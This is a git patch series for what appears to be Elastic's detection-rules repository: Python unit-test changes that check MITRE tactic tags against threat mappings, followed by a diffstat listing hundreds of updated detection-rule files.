From 12fe443e72fcb9fa0f6d4287f925824834fe0232 Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Mon, 23 Mar 2026 16:56:45 -0500 Subject: [PATCH 01/16] update tag & tacit unit test --- tests/test_all_rules.py | 118 +++++++++++++++++++++------------------- 1 file changed, 61 insertions(+), 57 deletions(-) diff --git a/tests/test_all_rules.py b/tests/test_all_rules.py index 584b6fba1cf..2aef99982dc 100644 --- a/tests/test_all_rules.py +++ b/tests/test_all_rules.py @@ -11,6 +11,7 @@ import uuid from collections import defaultdict from pathlib import Path +from typing import Any import eql import kql @@ -43,6 +44,39 @@ PACKAGE_STACK_VERSION = Version.parse(current_stack_version(), optional_minor_and_patch=True) +def _flat_threat_tactic_names(threat: list[Any]) -> list[str]: + """Tactic display names from ``rule.threat`` in encounter order (may repeat).""" + names: list[str] = [] + for entry in threat: + tactic = getattr(entry, "tactic", None) + if tactic is None: + continue + raw = getattr(tactic, "name", None) + if raw: + names.append(str(raw)) + return names + + +def _mitre_tactic_tag_gaps( + rule_tags: list[str], + threat_tactic_names: list[str], + attack_tactics_set: set[str], + *, + prefix: str = "Tactic: ", +) -> tuple[list[str], list[str]]: + """``(missing Tactic tags, orphan MITRE tactic names on tags)``.""" + unique_names = list(dict.fromkeys(threat_tactic_names)) + missing = [f"{prefix}{name}" for name in unique_names if f"{prefix}{name}" not in rule_tags] + tagged_mitre: list[str] = [] + for t in rule_tags: + if isinstance(t, str) and t.startswith(prefix): + suffix = t.removeprefix(prefix).strip() + if suffix in attack_tactics_set: + tagged_mitre.append(suffix) + unexpected = [n for n in tagged_mitre if n not in threat_tactic_names] + return missing, unexpected + + class TestValidRules(BaseRuleTest): """Test that all detection rules load properly without duplicates.""" @@ -363,16 +397,16 @@ def test_tactic_to_technique_correlations(self): ) def test_duplicated_tactics(self): - """Check that a tactic is only defined once.""" + """Check that a tactic is only defined once per framework (ATT&CK vs ATLAS may share display names).""" for rule in self.all_rules: threat_mapping = rule.contents.data.threat - tactics = [t.tactic.name for t in threat_mapping or []] - duplicates = sorted({t for t in tactics if tactics.count(t) > 1}) + pairs = [(t.framework, t.tactic.name) for t in threat_mapping or []] + duplicates = sorted({p for p in pairs if pairs.count(p) > 1}) if duplicates: self.fail( f"{self.rule_str(rule)} duplicate tactics defined for {duplicates}. " - f"Flatten to a single entry per tactic" + f"Flatten to a single entry per tactic within each framework" ) @@ -470,45 +504,42 @@ def test_bbr_tags(self): error_rules = "\n".join(invalid_bbr_rules) self.fail(f"The following building block rule(s) have missing tag: Rule Type: BBR:\n{error_rules}") - def test_primary_tactic_as_tag(self): - """Test that the primary tactic is present as a tag.""" - from detection_rules.attack import tactics + def test_threat_tactics_have_matching_tags(self): + """MITRE ATT&CK tactics in ``rule.threat`` must match ``Tactic: `` tags (and vice versa for ATT&CK names). + + Replaces the legacy check that tied the rule filename prefix to the first tactic tag. + """ + from detection_rules.attack import tactics as attack_tactic_names + prefix = "Tactic: " + attack_tactics_set = set(attack_tactic_names) invalid = [] - tactics = set(tactics) for rule in self.all_rules: - rule_tags = rule.contents.data.tags + rule_tags = rule.contents.data.tags or [] if "Continuous Monitoring" in rule_tags or rule.contents.data.type == "machine_learning": continue threat = rule.contents.data.threat - if threat: - missing = [] - threat_tactic_names = [e.tactic.name for e in threat] - primary_tactic = f"Tactic: {threat_tactic_names[0]}" - - # missing primary tactic - if primary_tactic not in rule.contents.data.tags: - missing.append(primary_tactic) - - # listed tactic that is not in threat mapping - tag_tactics = set(rule_tags).intersection(tactics) - missing_from_threat = list(tag_tactics.difference(threat_tactic_names)) + if not threat: + continue - if missing or missing_from_threat: - err_msg = self.rule_str(rule) - if missing: - err_msg += f"\n expected: {missing}" - if missing_from_threat: - err_msg += f"\n unexpected (or missing from threat mapping): {missing_from_threat}" + threat_tactic_names = _flat_threat_tactic_names(threat) + missing, unexpected = _mitre_tactic_tag_gaps( + rule_tags, threat_tactic_names, attack_tactics_set, prefix=prefix + ) - invalid.append(err_msg) + if missing or unexpected: + err_msg = self.rule_str(rule) + if missing: + err_msg += f"\n expected: {missing}" + if unexpected: + err_msg += f"\n unexpected (or missing from threat mapping): {unexpected}" + invalid.append(err_msg) if invalid: - err_msg = "\n".join(invalid) - self.fail(f"Rules with misaligned tags and tactics:\n{err_msg}") + self.fail("Rules with misaligned tactic tags and threat mapping:\n" + "\n".join(invalid)) def test_os_tags(self): """Test that OS tags are present within rules.""" @@ -624,33 +655,6 @@ def test_timeline_has_title(self): class TestRuleFiles(BaseRuleTest): """Test the expected file names.""" - def test_rule_file_name_tactic(self): - """Test to ensure rule files have the primary tactic prepended to the filename.""" - bad_name_rules = [] - - for rule in self.all_rules: - rule_path = rule.path.resolve() - filename = rule_path.name - - # machine learning jobs should be in rules/ml or rules/integrations/ - if rule.contents.data.type == definitions.MACHINE_LEARNING: - continue - - threat = rule.contents.data.threat - authors = rule.contents.data.author - - if threat and "Elastic" in authors: - primary_tactic = threat[0].tactic.name - tactic_str = primary_tactic.lower().replace(" ", "_") - - if tactic_str != filename[: len(tactic_str)]: - bad_name_rules.append(f"{rule.id} - {Path(rule.path).name} -> expected: {tactic_str}") - - if bad_name_rules: - error_msg = "filename does not start with the primary tactic - update the tactic or the rule filename" - rule_err_str = "\n".join(bad_name_rules) - self.fail(f"{error_msg}:\n{rule_err_str}") - def test_bbr_in_correct_dir(self): """Ensure that BBR are in the correct directory.""" for rule in self.bbr: From 856a23bc510ea73bc5a865caa331d2f183e66cd4 Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Mon, 23 Mar 2026 16:57:14 -0500 Subject: [PATCH 02/16] add updated rules with tags/mitre mappings --- rules/apm/apm_403_response_to_a_post.toml | 16 ++- .../apm_405_response_method_not_allowed.toml | 16 ++- rules/apm/apm_sqlmap_user_agent.toml | 21 ++- ...mmand_and_control_common_llm_endpoint.toml | 24 ++-- ...rol_curl_wget_spawn_via_nodejs_parent.toml | 23 ++-- ...nai_process_suspicious_tld_connection.toml | 10 +- ..._control_genai_process_unusual_domain.toml | 18 ++- ...nd_control_suricata_elastic_defend_c2.toml | 9 +- .../command_and_control_tunnel_qemu.toml | 11 +- ...s_genai_process_sensitive_file_access.toml | 57 ++++---- .../credential_access_gitleaks_execution.toml | 16 +-- ...redential_access_trufflehog_execution.toml | 16 +-- ...e_evasion_deleting_websvr_access_logs.toml | 8 +- ..._evasion_encoding_rot13_python_script.toml | 13 +- ...nse_evasion_genai_config_modification.toml | 36 ++--- ...n_genai_process_compiling_executables.toml | 43 ++---- ...ss_encoding_prior_to_network_activity.toml | 46 ++++--- ...se_evasion_missing_events_after_alert.toml | 36 +---- ...asion_whitespace_padding_command_line.toml | 40 +----- ...y_virtual_machine_fingerprinting_grep.toml | 42 ++++-- ..._server_local_file_inclusion_activity.toml | 39 +++--- ...server_remote_file_inclusion_activity.toml | 35 ++--- .../execution_aws_ec2_lolbin_via_ssm.toml | 44 ++----- ...rnetes_api_request_by_usual_utilities.toml | 32 +---- ...ct_interactive_kubernetes_api_request.toml | 32 +---- ...tes_api_activity_by_unusual_utilities.toml | 34 ++--- ...ss_followed_by_kubernetes_api_request.toml | 50 ++----- .../execution_git_exploit_cve_2025_48384.toml | 28 ++-- ..._pre_or_post_install_script_execution.toml | 52 +------- ...xecution_openclaw_agent_child_process.toml | 64 ++++----- ...on_pentest_eggshell_remote_admin_tool.toml | 20 +-- ...otential_widespread_malware_infection.toml | 20 +-- ...ontainer_creation_with_host_reference.toml | 27 +--- ...cution_register_github_actions_runner.toml | 60 +++------ .../execution_revershell_via_shell_cmd.toml | 31 +++-- .../execution_sap_netweaver_jsp_webshell.toml | 39 ++---- ...execution_sap_netweaver_webshell_exec.toml | 67 +++++++--- ...tion_suspicious_java_netcon_childproc.toml | 40 +++--- .../execution_via_github_actions_runner.toml | 71 +++++----- ...er_tracking_id_tampering_via_env_vars.toml | 70 ++-------- ...t_alert_from_a_process_with_cpu_spike.toml | 9 +- .../impact_alerts_on_host_with_cpu_spike.toml | 12 +- ..._access_azure_o365_with_network_alert.toml | 41 +++--- ...defend_alert_genai_utility_descendant.toml | 17 +-- ...ccess_execution_susp_react_serv_child.toml | 29 ++-- ...s_exfiltration_new_usb_device_mounted.toml | 29 +--- ..._ssl_vpn_login_followed_by_siem_alert.toml | 9 +- ...ial_access_ollama_api_external_access.toml | 30 ++--- ..._access_zoom_meeting_with_no_passcode.toml | 15 +-- ...tiple_alerts_by_host_ip_and_source_ip.toml | 16 ++- ...erts_email_elastic_defend_correlation.toml | 25 ++-- ...le_alerts_llm_compromised_user_triage.toml | 23 ++-- ...ence_ssh_authorized_keys_modification.toml | 42 +----- ...eb_server_potential_command_injection.toml | 76 ++--------- ...lege_escalation_echo_nopasswd_sudoers.toml | 31 +++-- ...ation_setuid_setgid_bit_set_via_chmod.toml | 34 ++--- .../privilege_escalation_trap_execution.toml | 20 +-- ..._server_discovery_or_fuzzing_activity.toml | 7 +- ...eb_server_unusual_spike_in_error_logs.toml | 7 +- ...unusual_spike_in_error_response_codes.toml | 7 +- ...ssance_web_server_unusual_user_agents.toml | 33 +---- ...collection_cloudtrail_logging_created.toml | 30 ++--- ...nticated_bucket_access_by_rare_source.toml | 22 +--- ...cess_aws_getpassword_for_ec2_instance.toml | 10 +- ...ial_access_iam_user_addition_to_group.toml | 31 ++--- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 13 +- ..._evasion_cloudtrail_logging_suspended.toml | 13 +- ...nse_evasion_cloudwatch_alarm_deletion.toml | 12 +- ..._evasion_config_service_rule_deletion.toml | 12 +- ...vasion_configuration_recorder_stopped.toml | 12 +- ...ion_ec2_serial_console_access_enabled.toml | 39 +++--- ...defense_evasion_rds_instance_restored.toml | 35 +++-- ...sion_s3_bucket_configuration_deletion.toml | 16 +-- ..._s3_bucket_lifecycle_expiration_added.toml | 37 +----- .../aws/defense_evasion_sqs_purge_queue.toml | 33 ++--- ...ense_evasion_sts_get_federation_token.toml | 31 +---- ...ec2_userdata_request_for_ec2_instance.toml | 22 +--- ...eration_via_update_assume_role_policy.toml | 30 +---- ...iscovery_ssm_inventory_reconnaissance.toml | 10 +- ...mbda_external_layer_added_to_function.toml | 33 +++-- ..._new_terms_cloudformation_createstack.toml | 10 +- ...tration_dynamodb_scan_by_unusual_user.toml | 25 +--- .../aws/exfiltration_ec2_export_task.toml | 47 ++----- ..._full_network_packet_capture_detected.toml | 43 +----- .../aws/exfiltration_rds_snapshot_export.toml | 28 ++-- ...icy_added_for_external_account_access.toml | 38 ++---- ...bucket_policy_added_for_public_access.toml | 38 ++---- ...ns_rare_protocol_subscription_by_user.toml | 46 +------ ..._eventbridge_rule_disabled_or_deleted.toml | 26 ++-- ..._s3_bucket_enumeration_or_brute_force.toml | 39 +----- .../impact_cloudtrail_logging_updated.toml | 45 ++----- .../impact_cloudwatch_log_group_deletion.toml | 34 +---- ...impact_cloudwatch_log_stream_deletion.toml | 34 +---- .../impact_ec2_disable_ebs_encryption.toml | 34 ++--- ...mpact_ec2_ebs_snapshot_access_removed.toml | 8 +- .../aws/impact_iam_deactivate_mfa_device.toml | 36 +++-- ..._cluster_deletion_protection_disabled.toml | 27 ++-- .../aws/impact_rds_snapshot_deleted.toml | 11 +- ...t_object_uploaded_with_ransom_keyword.toml | 18 +-- .../initial_access_console_login_root.toml | 31 +---- .../aws/initial_access_password_recovery.toml | 15 +-- ...tance_connect_ssh_public_key_uploaded.toml | 39 +----- ...l_movement_ec2_instance_console_login.toml | 75 +++-------- ...ns_topic_message_publish_by_rare_user.toml | 44 +------ .../ml_cloudtrail_error_message_spike.toml | 36 +---- .../aws/ml_cloudtrail_rare_error_code.toml | 60 +-------- .../ml_cloudtrail_rare_method_by_city.toml | 20 +-- .../ml_cloudtrail_rare_method_by_country.toml | 20 +-- .../ml_cloudtrail_rare_method_by_user.toml | 57 +------- ...ttempt_to_register_virtual_mfa_device.toml | 17 +-- .../persistence_ec2_network_acl_creation.toml | 27 +--- ...e_ec2_route_table_modified_or_deleted.toml | 29 ++-- ..._group_configuration_change_detection.toml | 23 +--- ..._iam_api_calls_via_user_session_token.toml | 32 ++--- ...nce_iam_create_login_profile_for_root.toml | 16 +-- .../aws/persistence_iam_group_creation.toml | 16 +-- ...persistence_iam_oidc_provider_created.toml | 32 +---- ...ce_iam_roles_anywhere_profile_created.toml | 33 +++-- ...usted_anchor_created_with_external_ca.toml | 13 +- ...persistence_iam_saml_provider_created.toml | 31 ++--- ...oor_invoke_function_for_any_principal.toml | 30 ++--- ...nce_rds_db_instance_password_modified.toml | 35 ++--- .../persistence_rds_instance_made_public.toml | 32 ++--- ...oute_53_domain_transfer_lock_disabled.toml | 33 ++--- ...domain_transferred_to_another_account.toml | 28 +--- ..._53_hosted_zone_associated_with_a_vpc.toml | 46 ++----- .../aws/persistence_route_table_created.toml | 29 ++-- ...e_sensitive_operations_via_cloudshell.toml | 27 +++- ...sistence_sts_assume_role_with_new_mfa.toml | 58 +++----- ...tratoraccess_policy_attached_to_group.toml | 24 ++-- ...stratoraccess_policy_attached_to_role.toml | 24 ++-- ...stratoraccess_policy_attached_to_user.toml | 30 ++--- ...tomer_managed_policy_attached_to_role.toml | 35 +++-- ..._escalation_iam_saml_provider_updated.toml | 31 +++-- ...alation_iam_update_assume_role_policy.toml | 43 +++--- ...escalation_role_assumption_by_service.toml | 42 ++---- ...ge_escalation_role_assumption_by_user.toml | 36 +---- ...oot_from_rare_user_and_member_account.toml | 24 +--- ...rivilege_escalation_sts_role_chaining.toml | 62 ++++----- ...opment_sns_topic_created_by_rare_user.toml | 27 +--- ..._bedrock_execution_without_guardrails.toml | 50 +++++-- ...ls_multiple_violations_by_single_user.toml | 24 ++-- ...multiple_violations_in_single_request.toml | 24 ++-- ...confidence_misconduct_blocks_detected.toml | 24 ++-- ...k_high_resource_consumption_detection.toml | 82 ++++++++++-- ...attempts_to_use_denied_models_by_user.toml | 24 ++-- ...ve_information_policy_blocks_detected.toml | 24 ++-- ...multiple_topic_policy_blocks_detected.toml | 24 ++-- ...ation_exception_errors_by_single_user.toml | 26 ++-- ..._multiple_word_policy_blocks_detected.toml | 29 ++-- ...point_access_from_unusual_application.toml | 21 ++- ...ss_by_unusual_public_client_via_graph.toml | 8 +- ...s_azure_entra_susp_device_code_signin.toml | 21 +-- ...s_azure_storage_account_keys_accessed.toml | 31 +---- ...s_entra_id_excessive_account_lockouts.toml | 17 +-- ...ial_access_entra_id_suspicious_signin.toml | 39 +++--- ...ss_entra_id_totp_brute_force_attempts.toml | 10 +- ..._access_key_vault_excessive_retrieval.toml | 33 ++--- ...ccess_storage_account_key_regenerated.toml | 28 +--- ...se_evasion_automation_runbook_deleted.toml | 21 ++- ...insights_diagnostic_settings_deletion.toml | 10 +- ...nse_evasion_kubernetes_events_deleted.toml | 16 +-- ...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...overy_bloodhound_user_agents_detected.toml | 24 +--- ...d_teamfiltration_user_agents_detected.toml | 82 ++++-------- ...ge_blob_container_access_modification.toml | 29 +--- ...torage_blob_download_azcopy_sas_token.toml | 33 ++--- ...ct_azure_compute_vm_snapshot_deletion.toml | 8 +- ...t_azure_compute_vm_snapshot_deletions.toml | 8 +- ...impact_azure_storage_account_deletion.toml | 10 +- ...ure_storage_account_deletion_multiple.toml | 10 +- ...ct_key_vault_modified_by_unusual_user.toml | 10 +- .../azure/impact_kubernetes_pod_deleted.toml | 10 +- ...act_resources_resource_group_deletion.toml | 22 +--- ...ster_credential_access_unusual_source.toml | 38 +++--- ..._actor_token_user_impersonation_abuse.toml | 48 ++----- ...d_device_code_auth_with_broker_client.toml | 51 +++---- ...s_entra_id_external_guest_user_invite.toml | 26 ++-- ..._id_federated_login_by_unusual_client.toml | 51 +++---- ...a_id_first_time_seen_device_code_auth.toml | 21 +-- ...ingle_session_from_multiple_addresses.toml | 41 +----- ...sent_grant_via_registered_application.toml | 47 +++---- ..._code_grant_unusual_app_resource_user.toml | 42 +++--- ...via_first_party_microsoft_application.toml | 46 ++----- ...tra_id_oauth_user_impersonation_scope.toml | 29 +--- ...ial_access_entra_id_powershell_signin.toml | 24 +--- ...a_id_protection_sign_in_risk_detected.toml | 57 ++------ ...ntra_id_protection_user_risk_detected.toml | 43 +----- ...tra_id_rare_app_id_for_principal_auth.toml | 49 ++++--- ...cation_requirement_for_principal_user.toml | 37 +----- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 49 +++---- ...ph_first_occurrence_of_client_request.toml | 41 +++--- .../azure/ml_azure_event_failures.toml | 33 ++--- .../azure/ml_azure_rare_event_failures.toml | 60 +-------- .../azure/ml_azure_rare_method_by_city.toml | 21 +-- .../ml_azure_rare_method_by_country.toml | 21 +-- .../azure/ml_azure_rare_method_by_user.toml | 61 +++------ ...ersistence_automation_account_created.toml | 23 +--- ...ersistence_automation_webhook_created.toml | 15 +-- ...id_conditional_access_policy_modified.toml | 32 +++-- ...id_global_administrator_role_assigned.toml | 34 +++-- ...stence_entra_id_mfa_disabled_for_user.toml | 32 +++-- ..._entra_id_pim_user_added_global_admin.toml | 24 +++- ...ged_identity_management_role_modified.toml | 44 +++---- ...rt_to_prt_transition_from_user_device.toml | 40 +----- ...d_service_principal_credentials_added.toml | 32 +++-- ...e_principal_federated_issuer_modified.toml | 36 +---- ...nant_domain_federation_via_audit_logs.toml | 47 +++---- ..._added_as_owner_for_azure_application.toml | 22 ++-- ..._as_owner_for_azure_service_principal.toml | 33 +++-- ...id_user_signed_in_from_unusual_device.toml | 49 +++---- ...sistence_event_hub_created_or_updated.toml | 32 +++-- ...ce_graph_eam_addition_or_modification.toml | 30 ++--- ..._protect_alert_followed_by_device_reg.toml | 13 +- ...ure_rbac_administrator_roles_assigned.toml | 29 ++-- ..._elevate_to_user_administrator_access.toml | 32 +++-- ...on_kubernetes_aks_rolebinding_created.toml | 44 +++---- ...a_id_custom_domain_added_and_verified.toml | 19 +-- ...openai_denial_of_ml_service_detection.toml | 41 ++++-- ...ai_insecure_output_handling_detection.toml | 22 ++-- .../azure_openai_model_theft_detection.toml | 62 +++++++-- .../command_and_control_beaconing.toml | 16 +-- ...and_control_beaconing_high_confidence.toml | 16 +-- ...socks_proxy_detected_inside_container.toml | 8 +- ...teractive_file_download_from_internet.toml | 51 ++----- ...control_tunneling_and_port_forwarding.toml | 7 +- ..._files_compression_inside_a_container.toml | 38 +++--- ...r_passwords_search_inside_a_container.toml | 24 ++-- ...ss_service_account_token_or_cert_read.toml | 7 +- ..._decoded_payload_piped_to_interpreter.toml | 64 ++++----- ...le_creation_execution_deletion_cradle.toml | 35 +++-- ...s_execution_from_suspicious_directory.toml | 49 +++---- ...ed_object_modified_inside_a_container.toml | 29 ++-- ...potential_evasion_via_encoded_payload.toml | 45 +------ .../discovery_dns_enumeration.toml | 12 +- .../discovery_environment_enumeration.toml | 7 +- ...overy_kubelet_certificate_file_access.toml | 28 ++-- ..._enumeration_from_interactive_process.toml | 12 +- ...covery_service_account_namespace_read.toml | 7 +- ...work_tool_launched_inside_a_container.toml | 44 +------ .../discovery_tool_enumeration.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 46 +++---- ...e_file_creation_followed_by_execution.toml | 31 +---- ...e_creation_in_system_binary_locations.toml | 46 ++----- ...shell_spawned_from_inside_a_container.toml | 7 +- .../execution_kubeletctl_execution.toml | 31 ++--- ...stener_established_inside_a_container.toml | 28 ++-- ...payload_downloaded_and_piped_to_shell.toml | 49 +++---- ...irect_kubelet_access_via_process_args.toml | 41 ++---- ...ecutable_via_chmod_inside_a_container.toml | 25 +--- ...ractive_interpreter_command_execution.toml | 73 +++-------- ...ication_of_persistence_relevant_files.toml | 72 +++------- ..._keys_modification_inside_a_container.toml | 40 +----- ...e_suspicious_echo_or_printf_execution.toml | 108 ++++++++------- ...ous_webserver_child_process_execution.toml | 71 +++++----- ...berarkpas_error_audit_event_promotion.toml | 22 +--- ...commended_events_to_monitor_promotion.toml | 22 +--- ...ration_ml_high_bytes_destination_port.toml | 26 ++-- ...high_bytes_written_to_external_device.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...d_control_ml_dga_high_sum_probability.toml | 8 +- ...istence_suspicious_file_modifications.toml | 124 +++++++++--------- ...collection_gcp_pub_sub_topic_creation.toml | 15 +-- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 26 ++-- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 26 ++-- ...p_storage_bucket_permissions_modified.toml | 45 ++++--- ...virtual_private_cloud_network_deleted.toml | 31 ++--- ...p_virtual_private_cloud_route_created.toml | 19 ++- ...p_virtual_private_cloud_route_deleted.toml | 19 ++- ...tration_gcp_logging_sink_modification.toml | 29 ++-- ...l_access_gcp_iam_custom_role_creation.toml | 47 +++---- .../gcp/ml_gcp_error_message_spike.toml | 33 ++--- .../gcp/ml_gcp_rare_error_code.toml | 59 +-------- .../gcp/ml_gcp_rare_method_by_city.toml | 22 +--- .../gcp/ml_gcp_rare_method_by_country.toml | 22 +--- .../gcp/ml_gcp_rare_method_by_user.toml | 57 +------- ..._gcp_iam_service_account_key_deletion.toml | 26 ++-- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- ...hub_protected_branch_settings_changed.toml | 10 +- .../github/execution_github_app_deleted.toml | 25 ++-- ..._high_number_of_cloned_repos_from_pat.toml | 37 +++--- ...multiple_behavior_alerts_from_account.toml | 10 +- .../execution_new_github_app_installed.toml | 25 ++-- ...thub_private_repository_turned_public.toml | 24 +--- ...ration_high_number_of_cloning_by_user.toml | 38 +++--- ...b_repository_activity_from_unusual_ip.toml | 52 ++------ ...umber_of_closed_pull_requests_by_user.toml | 45 ++----- ...protected_branch_force_pushes_by_user.toml | 45 ++----- ...protected_branch_force_pushes_by_user.toml | 42 ++---- ...github_actions_bot_first_push_to_repo.toml | 50 +++---- ...ub_actions_workflow_injection_blocked.toml | 29 +--- ...ss_github_register_self_hosted_runner.toml | 14 +- .../persistence_github_org_owner_added.toml | 44 ++++--- .../github/persistence_new_pat_created.toml | 36 ++--- ...tence_organization_owner_role_granted.toml | 32 +++-- ...ship_transferred_via_google_workspace.toml | 29 ++-- ...yption_key_accessed_by_anonymous_user.toml | 28 ++-- ...ed_from_blocklist_in_google_workspace.toml | 16 +-- ...d_to_google_workspace_trusted_domains.toml | 16 +-- ...marketplace_modified_to_allow_any_app.toml | 16 +-- ...le_workspace_mfa_enforcement_disabled.toml | 44 +++++-- ..._user_added_to_google_workspace_group.toml | 30 ++--- ...ogle_workspace_suspended_user_renewed.toml | 24 ++-- ...ed_to_external_drive_with_app_consent.toml | 41 +++--- ...tion_added_to_google_workspace_domain.toml | 8 +- ..._google_workspace_2sv_policy_disabled.toml | 34 +++-- ...workspace_admin_role_assigned_to_user.toml | 31 +++-- ...e_workspace_custom_admin_role_created.toml | 32 +++-- ...le_workspace_password_policy_modified.toml | 25 ++-- ...stence_google_workspace_role_modified.toml | 32 +++-- ...pace_user_organizational_unit_changed.toml | 31 +++-- ...led_for_google_workspace_organization.toml | 34 +++-- ...ure_arc_proxy_secret_configmap_access.toml | 35 +++-- .../defense_evasion_events_deleted.toml | 7 +- ...covery_denied_service_account_request.toml | 29 ++-- ...covery_suspicious_self_subject_review.toml | 8 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 21 ++- ...bidden_request_from_unsual_user_agent.toml | 22 ++-- ...nusual_request_response_by_user_agent.toml | 23 ++-- ...l_access_anonymous_request_authorized.toml | 12 +- ...ed_service_created_with_type_nodeport.toml | 18 ++- ...ted_with_excessive_linux_capabilities.toml | 26 ++-- ...e_escalation_pod_created_with_hostipc.toml | 26 ++-- ...calation_pod_created_with_hostnetwork.toml | 26 ++-- ...e_escalation_pod_created_with_hostpid.toml | 26 ++-- ...reated_with_sensitive_hostpath_volume.toml | 26 ++-- ...ege_escalation_privileged_pod_created.toml | 26 ++-- ...nge_followed_by_workload_modification.toml | 36 ++--- ...e_workload_modification_by_user_agent.toml | 49 ++----- ..._service_account_rbac_write_operation.toml | 14 +- ...ignment_of_controller_service_account.toml | 20 ++- ...ovement_ml_high_mean_rdp_process_args.toml | 35 +++-- ...ent_ml_high_mean_rdp_session_duration.toml | 14 +- ...ral_movement_ml_high_remote_file_size.toml | 11 +- ...ml_high_variance_rdp_session_duration.toml | 14 +- ...ovement_ml_rare_remote_file_directory.toml | 11 +- ...ovement_ml_rare_remote_file_extension.toml | 11 +- ...spike_in_connections_from_a_source_ip.toml | 14 +- ...ke_in_connections_to_a_destination_ip.toml | 14 +- ...al_movement_ml_spike_in_rdp_processes.toml | 14 +- ...ent_ml_spike_in_remote_file_transfers.toml | 30 +++-- ...nt_ml_unusual_time_for_an_rdp_session.toml | 14 +- ...ion_onedrive_excessive_file_downloads.toml | 24 +--- ...arepoint_file_download_via_powershell.toml | 25 +--- ...a_id_device_reg_via_oauth_redirection.toml | 37 +----- ...access_identity_user_account_lockouts.toml | 15 +-- ...on_entra_id_susp_oauth2_authorization.toml | 36 +---- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- ...ange_mailbox_audit_bypass_association.toml | 11 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 8 +- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...on_sharepoint_sharing_policy_weakened.toml | 14 +- ..._teams_custom_app_interaction_allowed.toml | 11 +- ...evasion_teams_external_access_enabled.toml | 11 +- ...very_sharepoint_sensitive_term_search.toml | 32 +---- ...tion_exchange_transport_rule_creation.toml | 22 ++-- ..._exchange_transport_rule_modification.toml | 22 ++-- ...sent_grant_via_registered_application.toml | 42 ++---- ...via_first_party_microsoft_application.toml | 34 ++--- ..._identity_unusual_sso_errors_for_user.toml | 38 ++---- ...ompliance_user_reported_phish_malware.toml | 15 +-- ...ce_user_restricted_from_sending_email.toml | 10 +- ...al_movement_onedrive_malware_uploaded.toml | 21 +-- ..._movement_sharepoint_malware_uploaded.toml | 21 +-- ...a_id_global_administrator_role_assign.toml | 34 +++-- ...e_exchange_management_role_assignment.toml | 30 +++-- ...picious_mailbox_permission_delegation.toml | 34 +++-- ...nge_new_or_modified_federation_domain.toml | 43 ++++-- ...harepoint_site_collection_admin_added.toml | 20 +-- ...l_access_attempted_bypass_of_okta_mfa.toml | 37 ++++-- ...mpts_to_brute_force_okta_user_account.toml | 8 +- ...vents_from_single_device_behind_proxy.toml | 18 +-- ..._token_hashes_for_single_okta_session.toml | 29 ++-- ...multiple_user_agent_os_authentication.toml | 29 ++-- ...ccess_okta_aitm_session_cookie_replay.toml | 33 +++-- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- ...tial_access_user_impersonation_access.toml | 26 ++-- ...tempt_to_deactivate_okta_network_zone.toml | 10 +- ...n_attempt_to_delete_okta_network_zone.toml | 10 +- ..._app_client_credential_token_exchange.toml | 32 +++-- ...kta_attempt_to_deactivate_okta_policy.toml | 16 +-- ...ttempt_to_deactivate_okta_policy_rule.toml | 10 +- ...on_okta_attempt_to_delete_okta_policy.toml | 20 +-- ...ta_attempt_to_delete_okta_policy_rule.toml | 16 +-- ...on_okta_attempt_to_modify_okta_policy.toml | 16 +-- ...ta_attempt_to_modify_okta_policy_rule.toml | 16 +-- ...ser_password_reset_or_unlock_attempts.toml | 37 +----- ...ttempt_to_deactivate_okta_application.toml | 27 ++-- ...ta_attempt_to_modify_okta_application.toml | 26 ++-- .../okta/impact_possible_okta_dos_attack.toml | 11 +- ...rrence_user_session_started_via_proxy.toml | 14 +- ...ta_user_attempted_unauthorized_access.toml | 29 +--- ...ss_sign_in_events_via_third_party_idp.toml | 44 +++++-- ...cation_sso_from_unknown_client_device.toml | 35 +++-- ...icious_activity_reported_by_okta_user.toml | 51 +------ ...ent_multiple_sessions_for_single_user.toml | 20 +-- ...eatinsight_threat_suspected_promotion.toml | 32 ++++- ...tor_privileges_assigned_to_okta_group.toml | 31 ++++- ...inistrator_role_assigned_to_okta_user.toml | 33 +++-- ...ence_attempt_to_create_okta_api_token.toml | 14 +- ...mfa_deactivation_with_no_reactivation.toml | 29 ++-- ..._or_delete_application_sign_on_policy.toml | 21 ++- ...login_to_okta_account_after_mfa_reset.toml | 38 +++--- ...unt_privileged_process_events_by_user.toml | 11 +- ..._process_command_line_entropy_by_user.toml | 28 ++-- ...l_linux_rare_process_executed_by_user.toml | 11 +- ..._high_sum_concurrent_sessions_by_user.toml | 33 ++--- ...access_ml_okta_rare_host_name_by_user.toml | 8 +- ...cess_ml_okta_rare_region_name_by_user.toml | 8 +- ...access_ml_okta_rare_source_ip_by_user.toml | 22 ++-- ..._group_application_assignment_changes.toml | 30 ++--- ...okta_spike_in_group_lifecycle_changes.toml | 33 ++--- ...kta_spike_in_group_membership_changes.toml | 33 ++--- ...okta_spike_in_group_privilege_changes.toml | 30 ++--- ..._in_user_lifecycle_management_changes.toml | 27 ++-- ...ws_high_count_group_management_events.toml | 35 +++-- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 13 +- ..._count_user_account_management_events.toml | 36 ++--- ...ss_ml_windows_rare_group_name_by_user.toml | 44 +++---- ...ndows_rare_privilege_assigned_to_user.toml | 8 +- 